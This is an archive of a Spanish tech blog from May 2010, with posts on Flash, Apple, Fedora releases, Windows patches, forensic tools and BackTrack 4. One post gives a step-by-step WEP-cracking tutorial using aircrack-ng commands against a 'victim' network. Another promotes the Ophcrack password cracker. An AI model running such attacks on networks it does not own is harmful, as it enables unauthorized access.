Demo Site

28 de mayo de 2010

Adobe responsabiliza a Apple por lentitud de Flash en Mac

Adobe responsabiliza a Apple por lentitud de Flash en Mac

Según un portavoz de Adobe, Apple es responsable de los problemas de compatibilidad entre Flash y los dispositivos portátiles iPhone e iPad.

 Apple ha debido explicar las razones que la llevaron a excluir la plataforma Flash de Adobe en sus unidades móviles. En abril, Steve Jobs, presidente de Apple, se refirió al tema en una carta abierta titulada "Reflexiones sobre Flash". Entre otras cosas, Jobs critica el rendimiento de la batería y la seguridad de Flash.

La impresión generalizada entre los usuarios de Macintosh es que Flash funciona con lentitud en esa plataforma, en comparación con la rapidez con que Flash es ejecutado en Windows. En Mac, Flash ocasiona una carga importante en el procesador, generando calor y mayor uso del ventilador.

Según Steve Allison, evangelista de Adobe, esta situación es atribuible únicamente a Apple y su actitud frente a desarrolladores externos. En una entrevista con ComputerSweden, Allison indica que Apple anteriormente no ha permitido a desarrolladores externos aprovechar directamente la capacidad del hardware. “Se nos ha obligado a colocar todo encima del sistema operativo, lo que resulta en una carga extraordinaria para el procesador".

Esta situación cambió con la versión más reciente de Mac OS X, ya que el nuevo interfaz de programación de aplicaciones (API) permite a los desarrolladores aprovechar directamente la capacidad del hardware. Adobe ha anunciado que esta característica contribuirá a mejorar Flash para Mac.

“Ahora tenemos la posibilidad de sumergirnos en el hardware y desarrollar un nuevo reproductor, que no esté colocado encima del sistema operativo. Por lo tanto, la próxima versión de Flash funcionará mejor en Mac", concluyó Steve Allison.

El tema ha causado amplia polémica entre ambas empresas. Cabe señalar que una reciente comparativa en que se evaluó el desempeño de Flash en un teléfono con el nuevo sistema operativo Android 2.2 llegó a la conclusión que el navegador de Android se ralentiza al activar Flash .

Las reacciones de Adobe han ido desde pedir a Apple "irse al diablo" hasta declarar "amamos a Apple"

Fuente : Diario ti

26 de mayo de 2010

Apple supera a Microsoft y se convierte en la mayor firma tecnológica


La capitalización de mercado de la compañía fundada por Steve Jobs subió a 227.000 millones de dólares


Nueva York (EFE). La eterna rivalidad entre Apple y Microsoft alcanzó hoy un nuevo hito: Apple Inc se convirtió en la mayor firma tecnológica del mundo por capitalización de mercado.

La capitalización de mercado de Apple subió a 227.000 millones de dólares, con lo que superó a Microsoft que rondaba los 226.550 millones de dólares, y se convirtió en la segunda mayor compañía del índice S&P 500. La mayor empresa del mercado por capitalización bursátil es la petrolera Exxon Mobil Corp.

La capitalización bursátil de una compañía es el valor que esta tiene en la bolsa (la cotización de cada acción multiplicada por el número total de acciones) y, por tanto, refleja en cuánto valora el mercado a esa compañía, con independencia del patrimonio real que tenga.

UN POCO DE HISTORIA

Nacida en 1976, Apple siempre había sido vista como la empresa marginal que fabricaba computadoras para un sector muy concreto de la población, los Macintosh, que además eran más caros que los ordenadores personales (PC).

Sin embargo, con la revolución que supuso en el mercado el lanzamiento de dispositivos móviles como el iPod , el iTouch y el iPhone , Apple dio un salto de gigante que ahora pretende alargar aún más con su exitoso ordenador plano iPad .

MALAS PREDICCIONES DE DELL

Muchos analistas no podrían haber predicho hace unos años que algo así ocurriría e incluso el propio Michael Dell, fundador del fabricante de la que durante muchos años fue la mayor empresa de PCs del mundo, dijo en 1997 que lo mejor que podía hacer Apple era cerrar y devolver el dinero a sus accionistas.

Hoy en día Dell ni siquiera vale una décima parte del valor bursátil de la conocida empresa con el logotipo de la manzana mordida.

BILL GATES, SALVADOR DE APPLE

Hasta tal punto la competencia estaba tan descompensada en los años noventa que Bill Gates , el fundador de Microsoft y por entonces ya el hombre más rico del mundo, invirtió 150 millones de dólares en Apple y se comprometió a no vender en tres años, para contribuir así a su recuperación.

Ese mismo año se decidió el regreso a la compañía como consejero delegado de Steve Jobs , el informático que creó Apple en el garaje de su casa con un amigo y que doce años antes había sido expulsado de la empresa por el consejo de administración.

A partir de la inversión de Gates, ambas firmas incluso colaboraron para que Microsoft, ya entonces líder mundial del software para PCs, fabricara una versión especial de su popular programa Office destinada al sistema operativo de Macintosh, por entonces el producto estrella y principal seña de identidad de Apple.

SITUACIÓN ACTUAL

Hoy en día los Mac no son ni siquiera uno de cada diez ordenadores vendidos en el mundo, pero Apple ha diversificado su cartera de productos, apostando siempre por el diseño, y por ejemplo su tienda virtual iTunes es la mayor del mundo para adquirir productos de música.

Mientras tanto, Microsoft se ha tenido que enfrentar a innumerables problemas relacionados con su posición dominante en el mercado del software y a una tremenda piratería de sus programas, al tiempo que los analistas dudan sobre su capacidad para reducir su dependencia de Office y Windows y encontrar un nuevo mercado donde despuntar con fuerza y ganar impulso.


Fuente: http://www.134internet.com/

25 de mayo de 2010

AL FIN FEDORA 13......!!!!!!



Como siempre, Fedora continúa el desarrollo (http://www.fedoraproject.org/wiki/Red_Hat_contributions) y ofrece lo último en software libre y de código abierto (http://www.fedoraproject.org/wiki/Features). Las siguientes secciones ofrecen un pequeño resumen de los cambios más significativos desde el último lanzamiento de Fedora. Para conocer más detalles acerca de otras características incluídas en Fedora 13 diríjase a las páginas wiki correspondientes que explican los objetivos y muestran su progreso.

Fuente: http://fedoraproject.org/es/

 Descargas
                                                                     
                     
FEDORA 13 ESCRITORIO GNOME
     32 bits                        64 bit
______________________________


                   
 FEDORA 13 ESCRITORIO KDE
     32 bits                          64bits          
____________________________
                            
                   
                
FEDORA 13 ESCRITORIO  LXDE
      32 bits                           64 bits
____________________________

              
FEDORA 13 ESCRITORIO XFCE
      32 bits                             64 bits
  

24 de mayo de 2010

Google Chrome OS v0.4


Google Chrome OS es un proyecto llevado a cabo por la compañía Google para desarrollar un sistema operativo basado en web(en la nube). A través de su blog oficial, Google anunció el 7 de julio de 2009 que Google Chrome OS será un sistema realizado en base a código abierto (GNU/Linux) y orientado inicialmente para miniportátiles, estando disponible en el segundo semestre de 2010. Funcionará sobre microprocesadores con tecnología x86 o ARM.


La compañía Google ha declarado que el código fuente del proyecto Google Chrome OS fue liberado a finales de 2009. Aunque el sistema se basa en un kernel Linux, tendrá un gestor de ventanas propio de Google, en lugar de GNOME o KDE, que son utilizados en la mayoría de distribuciones Linux de escritorio. Google planea incorporar la colaboración de la comunidad de software libre para ayudar en el desarrollo del proyecto.

El día 19 de noviembre de 2009 se presentó el sistema Chrome Os al mundo. Basado en Debian, una distribución de Linux, se trata de una extensión del famoso buscador. Trata de mantener la filosofía que siempre ha caracterizado a Google manteniendo los datos en servidores externos y no en los ordenadores personales, con lo que mejorar así los posibles daños de archivos o incluso filtraciones de virus. Se anunció también la característica más importante: no tener aplicaciones instaladas en el ordenador. Esto último es debido a la posibilidad de ejecutar aplicaciones desde internet, evitando así filtraciones o mal funcionamiento de los programas, y permitiendo una mejor actualización de ellos.

Descarga
Video de instalacion

22 de mayo de 2010

HTML5, Flash y la lucha por los estándares en la web. Tendencia 2010



El anuncio del iPad ha puesto la lucha por los estándares en la web, Flash y HTML 5 bajo el foco del "hype" que siempre rodea a los lanzamientos de Apple. Lo cierto es que aunque ahora esté en su momento de apogeo en lo que a cobertura informativa se refiere, la toma de posturas respecto a qué tecnologías se utilizarán para la web del futuro viene sucediéndose en los últimos años. En esta película hay varios actores y, aunque Apple va a tener su peso, lo cierto es que apostaría por Google y Microsoft - además de Adobe - como principales protagonistas de la trama. "El bueno, los feos y los malos", versión estándares web


El bueno, HTML5

El rol de bueno de película está siendo otorgado casi sin discusión a HTML5, el nuevo estándar que trae la vaga promesa de librarnos de los runtimes propietarios en la web. Y es que aunque Adobe ha hecho esfuerzos liberando herramientas, el runtime de Flash sigue siendo código propietario y no está en las quinielas que lo liberen. Su apuesta es que los algoritmos de procesamiento de gráficos vectoriales siguen siendo una ventaja competitiva y guardan las patentes como oro en paño.


HTML5 trae la posibilidad de que el vídeo - terreno dominado casi por completo por Flash - pueda distribuirse sin pasar por el aro de Adobe. Curiosamente esto hace que otro debate sobre estándares abiertos en los codecs cobre mayor actualidad, Youtube y otros actores están apostando por la fórmula "HTML5 + H.264 como códec", algo que Mozilla entre otros no aceptan al no ser un codec abierto (JaviPas lo resume). Aquí tenemos otra batalla económica, quienes han optado por codecs abiertos como Theora+Vorbis+Ogg no pagan las patentes de H.264, pero pueden sufrir los costes de mayor coste de ancho de banda al perder en compresión (más información al respecto en el blog de Dailymotion y aNieto2K.

No se trata en todo caso, sólo del vídeo, HTML5 es muy relevante en otros aspectos del desarrollo web, desde las RIA (aplicaciones ricas), como soporte offline, gestión de errores, unificación del renderizado de la página... Víctor hace tiempo hizo un especial con las novedades de HTML 5 en Anexom.


Los malos, Flash de Adobe y Silverlight de Microsoft

A Microsoft y a Adobe les toca el papel de malos en esta película. Ambos tienen una apuesta firma por runtimes propietarios como motor de la web, algo que rompe la propia naturaleza de la red: acceso desde cualquier nodo, sea cual sea la tecnología cliente. Flash ha logrado un nivel razonable de calidad multiplataforma y como explica Enrique un porcentaje de instalaciones brutal en ordenadores personales. Su frontera más significativa son los móviles (a pesar de ofrecer "Flash de verdad") y las plataformas cerradas, donde no es ni de lejos tan relevante. En vídeo se han convertido en la tecnología por excelencia, con un gran negocio de licencias y herramientas de desarrollo, pero los últimos movimientos hacen aparecer negros nubarrones en su visión de ser el nuevo Java.

En el lado de Microsoft, llevan años con lo misma tónica con Silverlight, maravilla técnica que casi nadie utiliza. Apostar por una tecnología propietaria de Redmond para construir el futuro de la web es algo que muy pocos están considerando una buena idea, a pesar de que como producto Silverlight es brillante. Aunque parezca un disparate, veo antes a Microsoft liberando Silverlight que a Adobe, que tiene mucho más que perder.


Los feos, Google, Apple... y de nuevo Microsoft

Apple lleva años rechazando Flash en iPhone y vuelve a poner el debate sobre la mesa con iPad. Sin embargo, los actores principales en la lucha entre HTML5, Flash y Silverlight son, en mi opinión, Google y Microsoft. El primero con una apuesta decidida por HTML5 desde hace años como explica este artículo de O´reilly, a pesar de lo cual algunos como Scoble le señalan como posible salvador de Flash atendiendo a su competencia con Apple. No lo creo, Google lleva mucho tiempo detrás de HTML5 en cuyo desarrollo ha influido y rechazando Flash y Silverlight a la hora de construir sus aplicaciones web.

Pero quien tiene gran parte de llave que puede acelerar la adopción de HTML5 es Microsoft con el soporte en Internet Explorer actor sin el cuál no se puede pensar en llegar al gran público en la web "de verdad". Apple puede restringir qué tecnologías se ejecutan en sus dispositivos cerrados, Google y otros pueden intentar empujar HTML5, pero hoy día desarrollar una aplicación web que no funcione en Explorer es renunciar a gran parte de los usuarios... y no sólo a los poco expertos, también a muchos corporativos en cuyas empresas sólo está hmologado el uso del navegador de Microsoft.


El desenlace de la película

Todavía no sabemos el final, pero sí mucho de los intereses que se entretejen en ella. En 2010 probablemente no sepamos cómo acaba, pero sí es probable que asistamos al continuo acose y derribo de Flash, para el que Adobe no parece encontrar socios de garantías que lo defiendan. Si no hay un giro inesperado en el mercado de los navegadores - que tiende de una forma pausada al fin de la hegemonía de Explorer - será Microsoft quien tenga la llave para acelerar un proceso en el que parece que tiene poco que ganar: imponer Silverlight se antoja muy complicado y salvar a Adobe tampoco es su sueño hecho realidad.

21 de mayo de 2010

Ophcrack Live CD


Esta es una herramienta para crackear las contraseñas de Windows basada en las tablas Rainbow. Es una implementación muy eficiente de las tablas rainbow hecha por los inventores de este método. Viene con una Interfaz Gráfica de Usuario GTK+ y corre bajo Windows, Mac OS X (CPU Intel) y también en Linux.

Lo podrian usar por si pierden u olvidan su clave de administrador.

Fuente: http://ophcrack.sourceforge.net/

Descargas:

VERSION XP

VERSION VISTA

20 de mayo de 2010

Un problema en el parche descubre una infección oculta



Un rootkit hace estragos en XP, parche para IE y actualizaciones de Adobe.

La infame Pantalla azul de la muerte regresó por sorpresa en febrero, como heraldo de un programa malicioso.

Algunos usuarios de Windows XP que habían aplicado todos los parches emitidos por Microsoft en su Patch Tuesday regular de ese mes se quejaron cuando sus sistemas empezaron a arrancar continuamente, quizás con la temida PAM. Pero la culpa no era de los parches.

En lugar de ellos, los reinicios fueron causados por un rootkit, un tipo de programa malicioso oculto que se usa para esconder otros programas maliciosos. Después de examinar los informes del problema, Microsoft encontró que unos cambios efectuados en los archivos esenciales del sistema hicieron que los sistemas infectados con el rootkit Alureon se volvieran locos después de instalar el parche para el núcleo MS10-015.

WINDOWS XP SUFRE

Microsoft dice que el problema con Alureon sólo afecta a los sistemas de 32 bits y mayormente a Windows XP. El parche para el núcleo resuelve una vulnerabilidad que los atacantes podrían usar para ejecutar mandos privilegiados en una PC, para Windows 2000, Server 2003, Vista, Server 2008 y Windows 7 (vea find.pcworld.com/69818). Para los usuarios de XP afectados, Microsoft está ofreciendo ayuda gratis si se llama al número 866/727-2338.

Un parche separado y menos problemático de Windows tapa un agujero importante de seguridad que puede permitir que los archivos envenenados de DirectShow AVI lancen ataques en los sistemas vulnerables. Este parche es esencial para todas las versiones de Windows (2000, XP, Server 2003, Vista, Server 2008, 7), excepto algunas versiones de Server 2003 y Server 2008. Para más detalles, visite find.pcworld.com/69819.

BLOQUEE LOS ATAQUES DE LA WEB

Para protegerse de potenciales ataques desde un sitio malicioso de la Web, obtenga un segundo parche crítico para Windows 2000, XP y Server 2003. La corrección se ocupa de una vulnerabilidad en el Windows Shell Handler (navegue hasta find.pcworld.com/69820 para más información).

Un error para las redes en Vista afecta la manera en que Windows maneja TCP/IP, que se utiliza para la mayoría de las comunicaciones en las redes. El peor agujero sólo puede ser aprovechado si usted tiene activado IPv6. Windows Server 2008 también está afectado, pero ninguna otra versión de Windows (vea find.pcworld.com/69822).

NUEVOS “KILL BITS” PARA IE

Por último, una actualización de “kill bits” para Internet Explorer bloqueará los controles ActiveX vulnerables para que no se ejecuten en el IE. Los “kill bits” adicionales (find.pcworld.com/69823) se consideran críticos para Windows XP y 2000 e importantes para Vista y Windows 7.

Ejecute Windows Update para asegurarse de que tiene esta corrección necesaria para Windows. Y no deje que el potencial de una trampa de reinicio perpetrada por un programa malicioso le disuada: la única cosa peor que una PAM sería estar infectado por un programa malicioso no detectado que roba su información.

MÁS ATAQUES CONTRA ADOBE

Según ScanSafe, una compañía de seguridad de la Web, cuatro de cada cinco ataques desde la Web encontrados a finales de 2009 eran de archivos PDF maliciosos que se concentraban en ciertos defectos de Adobe (find.pcworld.com/69824).

El último parche de Adobe actualiza Reader y Acrobat a 9.3.1 (o 8.2.1 si usted usa la versión 8). Pulse Ayuda•Comprobar actualizaciones para ver si tiene la última versión y visite find.pcworld.com/69825 para más detalles.

Fuente: http://www.pcwla.com/

Revelan numerosas vulnerabilidades en PHP

La iniciativa Month of PHP Security revela durante mayo diversas vulnerabilidades de PHP con el fin de mejorar la seguridad del "ecosistema PHP".

 En lo que va de mayo, los responsables de la iniciativa Month of PHP Security (MOPS) han revelado 23 vulnerabilidades hasta ahora desconocidas de PHP.

La mayoría de las vulnerabilidades publicadas hasta ahora están relacionadas directamente con PHP, en tanto que algunas corresponden a aplicaciones PHP de terceros. En la mayoría de los casos, MOPS incluye sugerencias para solucionar las vulnerabilidades.
La iniciativa fue tomada por el experto alemán en seguridad informática Stefan Esser, quien en 2007 realizó un proyecto similar denominado Month of PHP Bugs.

Fuente: MOPS

El Ordenador pertenece a una red bot

Determinadas situaciones y comportamientos indican que el equipo puede estar siendo controlado de forma remota por un usuario no autorizado.

Un informe elaborado por el equipo de investigación de amenazas informáticas de ESET, recoge los diez indicadores clave para que los usuarios de equipos informáticos puedan detectar de forma sencilla si su ordenador es parte de una botnet, o red de ordenadores zombies.

Las botnets o redes de ordenadores zombies son creadas por ciberdelincuentes para controlar de forma remota miles de ordenadores, y utilizarlos para llevar a cabo diversas acciones maliciosas. Normalmente, los creadores de las redes bot no buscan información relevante en el equipo atacado, sino su capacidad de procesamiento, su cantidad de memoria en disco duro o su conexión a Internet, de forma que pueden combinarlas para lanzar sus ataques.

Aunque muchos tipos de malware pueden causar comportamientos similares a los que causa un bot, hay algunos síntomas que no deberían ser ignorados. A continuación puede encontrar algunos indicadores frecuentes de que el ordenador está siendo controlado por un tercero no autorizado:

1 - Los programas se ejecutan muy despacio. Puede ser síntoma de que existen programas utilizando una gran cantidad de recursos en segundo plano.

2 - Su ordenador tarda mucho tiempo en apagarse, o no lo hace adecuadamente. A menudo, el malware tiene fallos que provocan distintos síntomas, como que el ordenador tarde mucho tiempo en apagarse o no lo haga correctamente. Sin embargo, los fallos del sistema operativo y los conflictos con programas legítimos pueden causar el mismo problema.

3 - El acceso a Internet se ralentiza. Si un bot está usando su ordenador para enviar spams de forma masiva, participa en un ataque contra otros ordenadores o sube y descarga una gran cantidad de datos, esto puede hacer que su acceso a Internet sea anormalmente lento.

4 - El ventilador del ordenador se satura cuando el sistema se encuentra en reposo. Aunque puede deberse a otras causas como la instalación en segundo plano de un paquete de actualizaciones, suciedad excesiva en el equipo o un fallo en la CPU, este es uno de los indicadores de que un programa se está ejecutando sin el conocimiento del usuario y utilizando una considerable cantidad de recursos de su equipo.

5 - El administrado de tareas de Windows muestra programas con nombres o descripciones complejos. Utilizar el administrador de tareas requiere algunas habilidades y conocimientos. Algunas veces, programas legítimos utilizan también nombres complejos. Una entrada en el administrador de tareas, generalmente, no es un identificador suficiente para calificar un programa como malicioso. Esto puede ayudar a encontrar programas dañinos, pero tienen que seguirse muchos otros pasos para verificar los archivos sospechosos encontrados. Eliminar procesos y archivos o entradas del registro porque usted “piensa" que provienen de un bot o de otro malware, puede causar la incapacidad de arrancar de nuevo su ordenador. Tenga mucho cuidado con las suposiciones antes de actuar.

6 - No puede descargar actualizaciones del sistema operativo. Esto es un síntoma que no puede ignorar. Incluso si no es un bot u otro tipo de malware, si usted no mantiene su sistema actualizado el ordenador corre el riesgo de verse afectado antes o después.

7 - No puede descargar actualizaciones de un producto antivirus o visitar la web del fabricante. Para evitar ser detectados, los códigos maliciosos suelen evitar la instalación o ejecución de programas antivirus, así como deshabilitar las actualizaciones y el acceso a las páginas de los fabricantes.

8 - Recibe pop-up de Windows y advertencias incluso cuando no usa el navegador. Aunque este es un síntoma clásico de adware, los bots pueden mostrar este comportamiento o incluso instalar adware en su equipo.

9 - Sus amigos y familiares han recibido un correo desde su dirección que usted no ha enviado. Esto puede ser un signo de un bot, de otro software malicioso o de que su cuenta de correo ha sido usada sin su permiso.

10 - Se encuentra una lista de posts que no ha enviado publicados en su muro de Facebook o twits que no ha enviado. Hay pocas razones, aparte de estar infectado por un software malicioso o que hayan violado su cuenta, que puedan causar este problema. Si le ocurre esto, es recomendable asegurarse de que su equipo no está infectado ejecutando un análisis antivirus y luego cambiar la contraseña de Facebook. También es bueno no utilizar la contraseña de Facebook en otros sitios.

Fuente: ESET.

19 de mayo de 2010

Pro-data Doctor Una Herramienta de bolsillo


Es una utilidad muy avanzada para la investigación del teléfono móvil que extrayendo la información completa del teléfono móvil basado Windows en muy poco tiempo. El programa de uso rentable del examinador del teléfono examina la información detallada teléfono de la célula incluyendo información del archivo de la información del archivo de base de datos (nombre, tipo, expediente, orden corta), del registro del OS (fabricación del dispositivo de PDA, uso instalado, perfil del uso), información del archivo (trayectoria del archivo, tamaño, tiempo de la creación), información del teléfono (el libro de teléfono, SMS, fijó y marcó por último número, número de IMEI, nombre del fabricante, nombre del abastecedor de servicio y estado de la señal, los archivos de audio/video, los archivos del cuadro, la información etc de la tarea del teléfono) y otros expedientes relevantes del teléfono.

El software forense handheld de la PC es compatible con conectividad del cable del USB y tiene acceso fácilmente al teléfono móvil por la conectividad portuaria para recopilar la información importante. La utilidad forense de PDA de los datos del doctor genera informe de información del teléfono móvil en el formato de TXT que se puede ahorrar en la localización especificada usuario. El software forense de la investigación es útil en la investigación del crimen, inspección científica y para esos usuarios que estén trabajando en varia tecnología móvil.

Características del software:

Extraiga la información detallada completa del teléfono móvil basado Windows en apenas un minuto.

Analice la información de la base de datos, la información del archivo, la información del teléfono, la información del registro del OS y la otra información relevante del dispositivo del teléfono móvil.

Genere el informe de información en texto o el formato del archivo del HTML para el uso adicional.

Facilite para ahorrar el informe sumario de la información del teléfono de la célula en la localización deseada.

Útil para los análisis científicos o del crimen de la investigación.

Apoye todas las marcas de fábrica importantes del dispositivo elegante del teléfono que incluye Nokia, Sony Ericsson, Motorola, Asus, Samsung, el LG, Audiovox y muchos más.

La herramienta simple con todo de gran alcance tiene interfaz de uso fácil.

No se requiere ninguna habilidad especial para funcionar el software.

La herramienta forense de la PC del bolsillo apoya el sistema operativo de siguiente:



Windows XP (Home Edition, Professional Edition, Media Center Edition, Tablet PC Edition)
Windows Vista
Windows 2003
Windows 2000
Windows ME
Windows NT
Windows 98

Requisitos del sistema:

Pentium or equivalent class processor
RAM (128 MB recommended)
20 MB of free space

Recuerde por favor:La sincronización del dispositivo móvil con su PC es una manera más rápida y más fácil de conectar la PC del tablero del escritorio o de la tableta con el dispositivo accionado móvil de Windows con la información, los ajustes y los archivos de la transferencia. La sincronización se maneja con diversos usos para Windows Vista y Windows.xp o anterior, satisface tan los cheques que el sistema operativo está funcionando en su PC y elige la opción apropiada.

Si su PC está funcionando en Windows Vista, sus ajustes de la sincronización serán manejados a través del centro móvil del dispositivo de Windows y si su PC está funcionando en Windows.xp, o anterior, sus ajustes de la sincronización serán manejados a través de Microsoft ActiveSync.


Fuente: http://www.p-dd.co.in/drive-recovery-software/es/ppcforensic.html

Descarga

18 de mayo de 2010

Análisis forense con AccessData FTK Imager


Una herramienta muy util es el Accessdata que se llama FTK Imager, enfocado basicamente a la adquisición y tratamiento de imágenes de cualquier dispositivo de almacenamiento, para ser posteriormente usadas como de evidencias forenses en un proceso legal.

Este producto es una gran ventaja por el interfaz gráfica, que permite crear imágenes de todo tipo de forma casi intuitiva con cómodos asistentes y funciones agrupadas en menús. Además, al tratarse de una herramienta Windows, FTK Imager es muy fácil de instalar y permite operar con dispositivos sujetos a controladores no universales, que muchas veces dificultan su montaje otros sistemas y que dotan al análisis en este tipo de plataformas de una laboriosidad adicional que no todo el mundo puede afrontar.


Fuente : http://www.accessdata.com/
Descargar : Aqui
Manual: Aqui

Crear máquinas virtuales a partir de imagen forense con LiveView

Mientras se efectua el análisis forense, es necesario no modificar la imagen realizada de un disco lo cual impide trabajar de forma interactiva con el sistema a investigación. La solución mas comun es crear mas de una copia de la imagen para poder iniciar el sistema operativo que llevan y poder interactuar con él. Este proceso no es muy cómodo y consume tiempo y recursos. LiveView es un desarrollo opensource del CERT y el Software Engineering Institute que transforma en máquina virtual la imagen forense. De ese modo se puede iniciar el sistema operativo e interactuar sin miedo a perder el estado inicial porque todas las modificaciones se escribirán fuera de la imagen.



16 de mayo de 2010

Conectarse a internet desde el Backtrack 4


Al ver que me he complicado un poco al conectarme a interet a travez del Backtrack 4 aqui les dejo las lineas de comando que hay que seguir:

Una vez ya dentro del sistema escribir estas lineas de comandos:

1.- start-network (solo si te conectas atravez de señal inlámbrica)
2.- ifconfig interfaz ip  (en interfaz le pones eth0, wlan0, etc)
3.- route add default gw ip_gw (ip_gw es para que pongas la puerta de enlace)
4.- echo name server ip_gw > /etc/resolv.conf
5.- Si estas conectandote con tu interfaz inalambrica te faltaria ingresar al "inicio"> internet>wicd y ahi eliges la señal con la que vas a trabajar.

Si no te gusta el interfaz grafica(wicd) lo puedes hacer con estas lineas de comandos

 ifconfig interfaz up

 iwconfig interfaz essid nuestraESSID

 iwconfig interfaz key s:clave_wireless

Ahora deberias poder conectarte a internet.Espero que les sirva

Buscador de Personas PIPL

 

Pipl es un buscador muy interesante, permite buscar gente por su nombre, e-mail, etc.

Este tipo de buscadores no son algo nuevo ( ya existia el yoName) pero lo novedoso resulta en el método de búsqueda que emplea Pipl.

En lugar de páginas web convencionales, este buscador recorre lo que es denominada la "web invisible" ó "profunda". Se trata de una parte de Internet compuesta de bases de datos, archivos, registros, etc. donde existe una gran cantidad de información acerca de personas como tú o yo (y no aparecen en los buscadores tradicionales).

Basta con introducir el nombre, un apellido y la localidad de la persona que te interesa - y Pipl se encarga de encontrarlo en las profundidades de la red.

Link a la Página:

http://www.pipl.com/

15 de mayo de 2010

Backtrack 4 Desencriptar CLaves WEP

No podía dejar de postear este tutorial ya que esta el Backtrack 4 .



1.- El Backtrack 4 lo pueden descargar de aquí mismo, bueno empecemos.

Lo primero sera loguearnos como root:

Login : root

Pass : toor

Luego cuando pida comando en el modo texto escribimos startx

2.- Una vez dentro buscamos la aplicacion llamada konsole(la llamaremos en adelante shell) .

3.- Escribimos ifconfig luego, buscaremos tu interfaz de red que puede llamarse wlan0 , rausb , eth0 etc ... y buscas adonde dice hardware address : anotas ese numero . ojo .. el numero llega hasta los 00 del final ...esa es tu dirección mac. luego cierras esa ventana .

4.- Abrimos otra shell y escribimos : airodump-ng wlan0 (tu interfaz de red)
y seleccionas la red a atacar. de ella copias el mac, bssid y el canal . cierras la shell.

5.- Abrimos otra shell y escribimos : airodump-ng -c 6(canal de la victima) -w prueba(Nombre que le quieras dar al archivo de captura) --bssid 66:77:88:99:00:11(mac de la victima) wlan0(tu interfaz de red) , con esto solo te aparecerá el AP(access point) de tu víctima , fijate en donde dice DATA ... esa cifra tiene que llegar por lo menos a 15.000 o mas para comenzar a desencriptar la clave .

6.- Para acelerar este proceso simplemente no manda DATA necesitamos abrir otra shell dejando la anterior abierta . y ahi escribimos : aireplay-ng -1 0 -a 66:77:88:99:00:11(mac del victima) -h 00:11:22:33:44:55(mac tuya) -e ejemplo(bssid de la red que atacamos es decir el nombre) wlan0(tu interfaz de red)

7.- En ese momento deberíamos empezar a recibir DATA mas rapido .. pero en algunos casos demora más porque no hay trafico de red .Luego se este paso podemos acelerar aun mas el proceso infectándole trafico a el router con el siguiente comando :

aireplay-ng -3 -b 66:77:88:99:00:11(mac víctima) -h 00:11:22:33:44:55( tu mac) wlan0(tu interfaz de red)

con eso debería recibir DATA mucho mas rápido. luego cuando tengamos  más de15.000 no cierres la shell y abre otra .

8.- Escribimos ahora aircrack-ng prueba(el nombre que le colocaste  al archivo de capturas)-01.cap


Nota : si comienzan a salir números circulando (hexadecimal) rápido quiere decir que no te alcanzan los data capturados y debes esperar mas . vas intentando hasta que nos diga key found : 44:55:66:77:88 esa seria la clave de tu red inalámbrica y  la copias sin los 2 puntos solo los números(es decir 4455667788) y la ingresas .

14 de mayo de 2010

Backtrack 4

Backtrack probablemente es la distribución de Linux de seguridad de más alto rating y aclamado hasta la fecha. BackTrack contiene un gran arsenal para pruebas de penetración basada en Linux que ayuda a los profesionales en seguridad. No es necesario tener el O.S instalado ya que puede usarse DVDLive o desde un dispositivo USB.


BackTrack es para todo lo público, desde los profesionales con más experiencia y seguridad a los recién llegados al campo de seguridad de la información. BackTrack promueve una forma rápida y fácil de encontrar y actualizar la mayor base de datos de seguridad para su colección de herramientas.
 
Fuente:  http://www.backtrack-linux.org/
Descarga : http://www.backtrack-linux.org/download.php?fname=bt4f

13 de mayo de 2010

Analisis de un BlackBerry a partir de su Backup

ABC Amber BlackBerry Converter




Es una herramienta muy útil que convierte mensajes de correo electrónico, contactos, mensajes SMS, mensajes PIN, entradas de Autotexto, eventos de calendario, las entradas de teléfonos lista de favoritos, notas, registros de llamadas telefónicas, tareas, etc de IPD o BBB (copia de seguridad de BlackBerry) archivos a cualquier formato que desee (PDF, HTML, CHM, RTF, HLP, TXT, DOC, MDB, XLS, CSV, etc) de forma fácil y rápida.

Fuente: http://www.processtext.com/abcblackberryipdeditor.html

Descarga: Rapidshare

11 de mayo de 2010

Mattica

Para los que aún no conozcan Mattica.Tiene una herramienta muy poderosa ´´La barra de herramientas de Mattica´´ muy util para incursionar en el campo del computo forense. 



MaTTica fue creado para atender al cada vez mayor número de víctimas de las amenazas del mundo conectado como son los virus informáticos, los hackers, crackers e intrusos y las vulnerabilidades propias de los sistemas operativos, tanto de redes como de la propia Internet.

Misión

Ser el PRIMER LABORATORIO DE INVESTIGACIÓN DE DELITOS INFORMÁTICOS de América Latina apegado a las mejores prácticas, estándares y procedimientos de las agencias de investigación líderes en Latinoamérica, Estados Unidos y Europa para brindar los elementos necesarios de protección a la integridad física, financiera y moral de sus clientes frente a los delitos cibernéticos y a los riesgos informáticos.

Fuente y descargas : http://www.mattica.com/

10 de mayo de 2010

Fedora 14 se llamará “Laughlin”

                                             



Así fue anunciado hoy en la lista oficial de anuncios de fedora. Fedora 14 tendrá el nombre clave Laughlin.

El pasado 4 de mayo se inicio la busqueda para el nombre de Fedora 14,pues el dia de hoy culminaron las votaciones y la lista figura de la siguiente manera:

1.Laughlin con 610 votos.
2.Laramie con 594 votos.
3.Ventnor con 507 votos.
4.Mitikas con 482 votos.
5.Hoppin con 459 votos.
6.Fytnargin con 403 votos.

Recordemos que para elegir los nuevos nombres de Fedora éstos deben de tener una relación entre el nuevo con el anterior. Siendo así, la relación entre los nombres Laughlin y Goddard (Fedora 13) es que Robert B. Laughlin fue un físico al igual que Goddard .

Fuente: http://fedoreando.wordpress.com/

9 de mayo de 2010

DEFT LINUX ( Digital Evidence & Forensic Toolkit).



Es una distribución Linux basada en Xubuntu 9.10 con un kernel 2.6.31, escritorio LXDE con una gama de aplicaciones forenses (DEFT extra 2.0) orientada para la policia, investigadores, administradores de sistemas o especialistas forenses.

La lista de paquetes que integran es amplia con un contenido de calidad, acorde a las expectativas que nos ofrece, para que lo puedan comprobar incluyo extracto de paquetes (Fuente: http://www.deftlinux.net/)


DEFT v5 computer and network forensic packages list:

sleuthkit 3.01, collection of UNIX-based command line tools that allow you to investigate a computer
autopsy 2.21, graphical interface to the command line digital investigation tools in The Sleuth Kit
dhash 2, multi hash tool
aff lib 3.5.2, advanced forensic format
gpart, tool which tries to guess the primary partition table of a PC-type hard disk
guymager 0.4.2-1, a fast and most user friendly forensic imager
dd rescue 1.13, copy data from one file or block device to another
dcfldd 1.3.4.1, copy data from one file or block device to another with more functions
linen 6.01, Linux version of the industry- standard DOS-based EnCase acquisition tool
foremost 1.5.6, console program to recover files based on their headers, footers, and internal data structures photorec 6.11, easy carving tool
